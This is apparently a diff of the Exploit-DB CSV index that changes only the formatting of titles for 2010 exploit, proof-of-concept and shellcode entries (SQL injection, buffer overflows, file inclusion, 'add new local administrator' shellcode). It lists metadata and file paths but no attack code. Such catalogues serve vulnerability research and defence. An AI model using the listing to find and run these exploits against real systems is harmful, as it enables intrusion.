-15148,platforms/windows/dos/15148.txt,"MOAUB #29 - Microsoft Excel SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 +15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQLi) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 +15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0 +15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0 +15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0 +15148,platforms/windows/dos/15148.txt,"MOAUB #29 - Microsoft Excel SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0 @@ -13172,29 +13172,29 @@ id,file,description,date,author,platform,type,port 15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15163,platforms/php/webapps/15163.rb,"Joomla JE Directory Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 Shell Upload Vulnerability",2010-09-30,"Jeff Channell",php,webapps,0 -15165,platforms/php/webapps/15165.txt,"Zen Cart v1.3.9f Multiple Remote Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0 -15166,platforms/php/webapps/15166.txt,"Zen Cart v1.3.9f (typefilter) Local File Inclusion Vulnerability",2010-10-01,LiquidWorm,php,webapps,0 +15165,platforms/php/webapps/15165.txt,"Zen Cart 1.3.9f - Multiple Remote Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0 +15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion Vulnerability",2010-10-01,LiquidWorm,php,webapps,0 15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,Kingcope,windows,dos,0 15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution (MSF)",2010-10-01,Trancer,windows,remote,0 15169,platforms/php/webapps/15169.txt,"Evaria Content Management System 1.1 File Disclosure Vulnerability",2010-10-01,"khayeye shotor",php,webapps,0 -15171,platforms/php/webapps/15171.txt,"jCart v1.1 Multiple XSS/CSRF/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 -15173,platforms/php/webapps/15173.txt,"PhpMyShopping v1.0.1505 Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 +15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple XSS/CSRF/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 +15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 15174,platforms/php/webapps/15174.txt,"Tiki Wiki CMS Groupware 5.2 Multiple Vulnerabilities",2010-10-01,"John Leitch",php,webapps,0 15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 (index.php?forumID) SQL Injection",2010-10-01,Shamus,php,webapps,0 15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 Blind SQL Injection",2010-10-01,plucky,php,webapps,0 -15183,platforms/asp/webapps/15183.py,"Bka Haber v1.0 (Tr) File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0 +15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0 -15186,platforms/hardware/remote/15186.txt,"FileApp < 2.0 for iPhone, iPad and iPod Touch Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,hardware,remote,0 -15188,platforms/hardware/dos/15188.py,"FileApp < 2.0 for iPhone, iPad and iPod FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,hardware,dos,0 +15186,platforms/hardware/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,hardware,remote,0 +15188,platforms/hardware/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,hardware,dos,0 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability",2010-10-02,sqlhacker,asp,webapps,0 15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret SQL and XSS Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0 -15193,platforms/windows/dos/15193.pl,"Hanso Player Version 1.3.0 (.m3u) Denial of Service Vulnerability",2010-10-03,"xsploited security",windows,dos,0 +15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - (.m3u) Denial of Service Vulnerability",2010-10-03,"xsploited security",windows,dos,0 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability",2010-10-03,Hackeri-AL,php,webapps,0 -15198,platforms/php/webapps/15198.txt,"Aprox CMS Engine V6 Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",php,webapps,0 -15199,platforms/asp/webapps/15199.py,"Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py)",2010-10-04,ZoRLu,asp,webapps,0 +15198,platforms/php/webapps/15198.txt,"Aprox CMS Engine 6.0 - Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",php,webapps,0 +15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure Exploit (.py)",2010-10-04,ZoRLu,asp,webapps,0 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 SQL Injection Vulnerability",2010-10-04,cyb3r.anbu,php,webapps,0 -15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability (SEH - DEP BYPASS)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 +15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow Vulnerability (SEH - DEP BYPASS)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 15202,platforms/windows/shellcode/15202.c,"win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes",2010-10-04,"Anastasios Monachos",windows,shellcode,0 15203,platforms/windows/shellcode/15203.c,"generic win32 - add new local administrator 326 bytes",2010-10-04,"Anastasios Monachos",windows,shellcode,0 15204,platforms/php/webapps/15204.txt,"DNET Live-Stats 0.8 Local File Inclusion Vulnerability",2010-10-04,Blake,php,webapps,0 @@ -13203,14 +13203,14 @@ id,file,description,date,author,platform,type,port 15207,platforms/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 Local File Inclusion Vulnerability",2010-10-04,Blake,php,webapps,0 15208,platforms/php/webapps/15208.txt,"CuteNews (index.php?page) Local File Inclusion Vulnerability",2010-10-05,eidelweiss,php,webapps,0 15209,platforms/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 Local File Inclusion Vulnerability",2010-10-05,"soorakh kos",php,webapps,0 -15210,platforms/php/webapps/15210.txt,"Cag CMS Version 0.2 <= XSS & Blind SQL Injection Multiple Vulnerabilities",2010-10-05,Shamus,php,webapps,0 +15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - XSS & Blind SQL Injection Multiple Vulnerabilities",2010-10-05,Shamus,php,webapps,0 15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader Array Indexing Remote Code Execution Vulnerability",2010-10-06,"Knud and nSense",osx,dos,0 15213,platforms/asp/remote/15213.pl,"ASP.NET Padding Oracle Vulnerability (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0 15214,platforms/win32/dos/15214.py,"HP Data Protector Media Operations NULL Pointer Dereference Remote DoS",2010-10-06,d0lc3,win32,dos,19813 15215,platforms/multiple/dos/15215.txt,"Multiple Vendors libc/glob(3) Resource Exhaustion (+0day remote ftpd-anon)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0 15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) Remote File Upload",2010-10-07,KnocKout,php,webapps,0 -15218,platforms/asp/webapps/15218.txt,"xWeblog v2.2 (oku.asp?makale_id) SQL Injection Vulnerability",2010-10-07,KnocKout,asp,webapps,0 -15219,platforms/asp/webapps/15219.py,"xWeblog v2.2 (arsiv.asp tarih) SQL Injection Exploit",2010-10-08,ZoRLu,asp,webapps,0 +15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection Vulnerability",2010-10-07,KnocKout,asp,webapps,0 +15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - (arsiv.asp tarih) SQL Injection Exploit",2010-10-08,ZoRLu,asp,webapps,0 15220,platforms/php/webapps/15220.txt,"Flex Timesheet Authentication Bypass Vulnerability",2010-10-08,KnocKout,php,webapps,0 15222,platforms/php/webapps/15222.txt,"Joomla Community Builder Enhenced (CBE) Component LFI/RCE Vulnerability",2010-10-09,"Delf Tonder",php,webapps,0 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame Multiple SQL Injection Vulnerabilities",2010-10-09,KnocKout,php,webapps,0 @@ -13219,13 +13219,13 @@ id,file,description,date,author,platform,type,port 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability",2010-10-10,"Easy Laster",php,webapps,0 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0 -15231,platforms/windows/remote/15231.py,"Sync Breeze Server v2.2.30 Remote Buffer Overflow Exploit",2010-10-11,"xsploited security",windows,remote,0 +15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit",2010-10-11,"xsploited security",windows,remote,0 15232,platforms/php/webapps/15232.txt,"OrangeHRM 2.6.0.1 Local File Inclusion Vulnerability",2010-10-11,ZonTa,php,webapps,0 -15233,platforms/php/webapps/15233.txt,"BaconMap v1.0 SQL Injection Vulnerability",2010-10-11,"John Leitch",php,webapps,0 -15234,platforms/php/webapps/15234.txt,"BaconMap v1.0 Local File Disclosure Vulnerability",2010-10-11,"John Leitch",php,webapps,0 -15235,platforms/windows/remote/15235.html,"AoA Audio Extractor v2.x ActiveX ROP exploit",2010-10-11,mr_me,windows,remote,0 +15233,platforms/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection Vulnerability",2010-10-11,"John Leitch",php,webapps,0 +15234,platforms/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure Vulnerability",2010-10-11,"John Leitch",php,webapps,0 +15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP exploit",2010-10-11,mr_me,windows,remote,0 15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0 -15238,platforms/windows/remote/15238.py,"Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 +15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 15239,platforms/php/webapps/15239.html,"WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0 15240,platforms/php/webapps/15240.txt,"Collabtive v0.65 Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0 15241,platforms/windows/remote/15241.txt,"Oracle Java 6 OBJECT tag ""launchjnlp""/""docbase"" Param Buffer Overflow Exploit",2010-10-13,SkyLined,windows,remote,0 @@ -13234,9 +13234,9 @@ id,file,description,date,author,platform,type,port 15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 15245,platforms/solaris/local/15245.txt,"Oracle Solaris CVE-2010-3503 'su' Local Solaris Vulnerability",2010-10-13,prdelka,solaris,local,0 15247,platforms/php/webapps/15247.txt,"Exponent CMS v0.97 Multiple Vulnerabilities",2010-10-13,LiquidWorm,php,webapps,0 -15248,platforms/windows/dos/15248.txt,"Multiple Buffer Overflows in Winamp v5.5.8.2985",2010-10-13,"Luigi Auriemma",windows,dos,0 +15248,platforms/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos,0 15249,platforms/php/webapps/15249.txt,"Data/File upload and management Arbitrary File Upload Vulnerability",2010-10-14,saudi0hacker,php,webapps,0 -15250,platforms/windows/dos/15250.py,"Ease Jukebox v1.30 Denial of Service Vulnerability",2010-10-14,Sweet,windows,dos,0 +15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service Vulnerability",2010-10-14,Sweet,windows,dos,0 15251,platforms/php/webapps/15251.txt,"Xlrstats 2.0.1 SQL Injection Vulnerability",2010-10-14,Sky4,php,webapps,0 15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 Arbitrary File Upload Vulnerability",2010-10-15,saudi0hacker,php,webapps,0 15257,platforms/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 Denial of Service Vulnerability",2010-10-15,"MOHAMED ABDI",windows,dos,0 @@ -13253,12 +13253,12 @@ id,file,description,date,author,platform,type,port 15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0 15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0 -15273,platforms/multiple/dos/15273.txt,"Opera v10.63 SVG animation Element Denial of Service",2010-10-17,fla,multiple,dos,0 +15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker $ORIGIN expansion Vulnerability",2010-10-18,"Tavis Ormandy",linux,local,0 15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0 15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0 -15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0 +15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0 15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0 15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 .ogg Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0 @@ -13272,7 +13272,7 @@ id,file,description,date,author,platform,type,port 15295,platforms/php/webapps/15295.html,"sNews CMS Multiple XSS Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave player rcsL chunk memory corruption 0day",2010-10-21,Abysssec,windows,remote,0 15297,platforms/windows/dos/15297.txt,"Windows Mobile 6.1 and 6.5 Double Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 -15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < v8.1.7.3 Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 +15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 Blind SQL Injection Vulnerability",2010-10-21,"Salvatore Fresta",php,webapps,0 15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0 15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0 @@ -13289,23 +13289,23 @@ id,file,description,date,author,platform,type,port 15315,platforms/arm/shellcode/15315.S,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15316,platforms/arm/shellcode/15316.S,"ARM Loader Port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15317,platforms/arm/shellcode/15317.S,"ARM ifconfig eth0 and Assign Address",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM v8.4.0a Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 +15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) Local Denial of Service",2010-10-26,FB1H2S,windows,dos,0 15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 CSRF Change Admin Password POC",2010-10-26,Sweet,php,webapps,0 -15321,platforms/php/webapps/15321.txt,"DBHcms v1.1.4 (dbhcms_user and searchString) SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15322,platforms/php/webapps/15322.txt,"phpLiterAdmin v1.0 RC1 Authentication Bypass Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15323,platforms/php/webapps/15323.txt,"DZCP (deV!Lz Clanportal) v1.5.4 Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15324,platforms/php/webapps/15324.txt,"Novaboard v1.1.4 Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15325,platforms/php/webapps/15325.txt,"MyBB v1.6 Full Path Disclosure Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and searchString) - SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15323,platforms/php/webapps/15323.txt,"DZCP (deV!Lz Clanportal) 1.5.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15324,platforms/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15325,platforms/php/webapps/15325.txt,"MyBB 1.6 - Full Path Disclosure Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15326,platforms/php/webapps/15326.txt,"BloofoxCMS v0.3.5 Information Disclosure Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15327,platforms/php/webapps/15327.txt,"Energine CMS SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15328,platforms/php/webapps/15328.txt,"BloofoxCMS Registration Plugin SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15329,platforms/php/webapps/15329.txt,"Zomplog v3.9 CSRF Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15329,platforms/php/webapps/15329.txt,"Zomplog 3.9 - CSRF Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15330,platforms/php/webapps/15330.txt,"NinkoBB 1.3RC5 XSS Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15331,platforms/php/webapps/15331.txt,"Zomplog 3.9 Multiple XSS & XSRF Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15331,platforms/php/webapps/15331.txt,"Zomplog 3.9 - Multiple XSS & CSRF Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15332,platforms/php/webapps/15332.txt,"BlogBird Platform Multiple XSS Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15333,platforms/windows/remote/15333.txt,"MinaliC Webserver v1.0 Directory Traversal Vulnerability",2010-10-27,"John Leitch",windows,remote,0 -15334,platforms/windows/dos/15334.py,"MinaliC Webserver v1.0 Denial of Service Vulnerability",2010-10-27,"John Leitch",windows,dos,0 +15333,platforms/windows/remote/15333.txt,"MinaliC Webserver 1.0 - Directory Traversal Vulnerability",2010-10-27,"John Leitch",windows,remote,0 +15334,platforms/windows/dos/15334.py,"MinaliC Webserver 1.0 - Denial of Service Vulnerability",2010-10-27,"John Leitch",windows,dos,0 15335,platforms/php/webapps/15335.txt,"AlstraSoft E-Friends 4.96 Multiple Remote Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15336,platforms/windows/remote/15336.txt,"MinaliC Webserver 1.0 Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 Buffer Overflow Exploit",2010-10-27,Blake,windows,remote,0 @@ -13319,21 +13319,21 @@ id,file,description,date,author,platform,type,port 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library post upnp sscanf Buffer Overflow Vulnerability",2010-10-28,n00b,multiple,dos,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 15348,platforms/php/webapps/15348.txt,"Pub-Me CMS Blind SQL Injection Vulnerability",2010-10-28,H4f,php,webapps,0 -15349,platforms/windows/remote/15349.txt,"Home FTP Server v1.11.1.149 Post-Auth Directory Traversal",2010-10-29,chr1x,windows,remote,0 +15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Auth Directory Traversal",2010-10-29,chr1x,windows,remote,0 15350,platforms/php/webapps/15350.rb,"PHPKit <= 1.6.1 R2 overview.php SQL injection Vulnerability Exploit",2010-10-29,"Easy Laster",php,webapps,0 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL injection Exploit",2010-10-29,"Easy Laster",php,webapps,0 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,unknown,windows,remote,0 15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 Remote File Upload",2010-10-30,Setr0nix,php,webapps,0 15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0 -15356,platforms/windows/dos/15356.pl,"yPlay v2.4.5 Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0 -15357,platforms/windows/remote/15357.php,"Home FTP Server v1.11.1.149 RETR DELE RMD Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0 -15358,platforms/windows/remote/15358.txt,"SmallFTPD v1.0.3 Remote Directory Traversal Vulnerability",2010-10-31,"Yakir Wizman",windows,remote,0 +15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0 +15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0 +15358,platforms/windows/remote/15358.txt,"SmallFTPD 1.0.3 - Remote Directory Traversal Vulnerability",2010-10-31,"Yakir Wizman",windows,remote,0 15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 PHP Code Injection Vulnerability",2010-10-31,Beach,php,webapps,0 15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 PHP Code Injection Vulnerability",2010-10-31,Beach,php,webapps,0 15366,platforms/php/webapps/15366.txt,"Joomla Flip Wall Component (com_flipwall) SQL Injection Vulnerability",2010-10-31,"Fl0riX ",php,webapps,0 15367,platforms/php/webapps/15367.txt,"Joomla Sponsor Wall Component (com_sponsorwall) SQL Injection Vulnerability",2010-10-31,"Fl0riX ",php,webapps,0 -15368,platforms/windows/remote/15368.php,"Buffy v1.3 Remote Directory Traversal Exploit",2010-10-31,"Yakir Wizman",windows,remote,0 +15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Remote Directory Traversal Exploit",2010-10-31,"Yakir Wizman",windows,remote,0 15369,platforms/php/webapps/15369.php,"Auto CMS <= 1.8 Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0 15370,platforms/php/webapps/15370.txt,"XAMPP <= 1.7.3 multiple vulnerabilites",2010-11-01,TheLeader,php,webapps,0 15371,platforms/windows/remote/15371.txt,"Yaws 1.89 Directory Traversal Vulnerability",2010-11-01,nitr0us,windows,remote,0 @@ -13342,9 +13342,9 @@ id,file,description,date,author,platform,type,port 15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect ""*.SQL"" Format Heap Oveflow",2010-11-01,d0lc3,windows,dos,0 15380,platforms/hardware/dos/15380.txt,"Xerox 4595 Denial of Service Vulnerability",2010-11-01,chap0,hardware,dos,0 15381,platforms/php/webapps/15381.txt,"Collabtive SQL Injection Vulnerability",2010-11-01,"Anatolia Security",php,webapps,0 -15382,platforms/asp/webapps/15382.txt,"Douran Portal <= v3.9.7.55 Multiple Remote Vulnerabilities",2010-11-01,ItSecTeam,asp,webapps,0 +15382,platforms/asp/webapps/15382.txt,"Douran Portal <= 3.9.7.55 - Multiple Remote Vulnerabilities",2010-11-01,ItSecTeam,asp,webapps,0 15383,platforms/windows/dos/15383.c,"Rising RSNTGDI.sys Local Denial of Service Vulnerability",2010-11-02,ze0r,windows,dos,0 -15384,platforms/windows/dos/15384.c,"AVG Internet Security v9.0.851 Local Denial of Service Exploit",2010-11-02,"Nikita Tarakanov",windows,dos,0 +15384,platforms/windows/dos/15384.c,"AVG Internet Security 9.0.851 - Local Denial of Service Exploit",2010-11-02,"Nikita Tarakanov",windows,dos,0 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 Stored Cross Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0 15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 Stored Cross Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0 15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 Stored Cross Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0 @@ -13357,13 +13357,13 @@ id,file,description,date,author,platform,type,port 15397,platforms/asp/webapps/15397.txt,"Online Work Order System (OWOS) Professional Edition Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15398,platforms/asp/webapps/15398.txt,"Digger Solutions Newsletter Open Source SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15399,platforms/asp/webapps/15399.txt,"Site2Nite Business eListings SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 -15400,platforms/php/webapps/15400.txt,"Dolphin v7.0.3 Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,php,webapps,0 +15400,platforms/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,php,webapps,0 15403,platforms/windows/local/15403.py,"Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)",2010-11-02,"Chris Gabriel",windows,local,0 15404,platforms/php/webapps/15404.txt,"eLouai's Force Download Script Arbitrary Local File Download Vulnerability",2010-11-03,v1R00Z,php,webapps,0 15405,platforms/php/webapps/15405.txt,"digiSHOP SQL Injection Vulnerability",2010-11-03,Silic0n,php,webapps,0 15406,platforms/windows/local/15406.rb,"Minishare 1.5.5 Buffer Overflow Vulnerability (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local,0 15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite NtCreateKey Race Condition Vulnerability",2010-11-03,"Nikita Tarakanov",windows,dos,0 